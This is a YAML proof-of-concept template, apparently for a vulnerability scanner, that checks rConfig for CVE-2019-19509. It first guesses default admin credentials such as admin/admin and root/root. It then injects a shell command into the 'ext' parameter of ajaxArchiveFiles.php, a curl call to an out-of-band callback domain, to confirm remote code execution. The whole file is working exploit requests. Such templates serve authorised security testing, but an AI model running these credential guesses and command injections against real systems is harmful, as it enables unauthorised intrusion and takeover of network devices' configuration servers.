name: poc-yaml-rconfig-ajaxarchivefiles-cve-2019-19509-rce
binding: 8dd60c9f-8167-496f-9da0-2e22b90fc378
manual: true
detail:
    author: Xz
    links:
        - https://www.exploit-db.com/exploits/47982
    vulnerability:
        id: CT-89671
        level: high
    description: rConfig CVE-2019-19509 Authenticated Remote Code Execution
    check_action: 需要登录认证user=admin&pass=admin&sublogin=1
transport: http
set:
    reverse: newReverse()
    reverseDNS: reverse.domain
payloads:
    payloads:
        p1:
            username: |
                "admin"
            password: |
                "123"
        p2:
            username: |
                "admin"
            password: |
                "admin"
        p3:
            username: |
                "admin"
            password: |
                "123456"
        p4:
            username: |
                "admin"
            password: |
                "admin123"
        p5:
            username: |
                "root"
            password: |
                "root"
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /lib/crud/userprocess.php
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: user={{username}}&pass={{password}}&sublogin=1
            follow_redirects: false
        expression: response.status == 302
    r1:
        request:
            cache: true
            method: GET
            path: /lib/ajaxHandlers/ajaxArchiveFiles.php?path=test&ext=;curl%20{{reverseDNS}}
            headers:
                Content-Type: application/x-www-form-urlencoded
            follow_redirects: false
        expression: reverse.wait(5)
expression: r0() && r1()
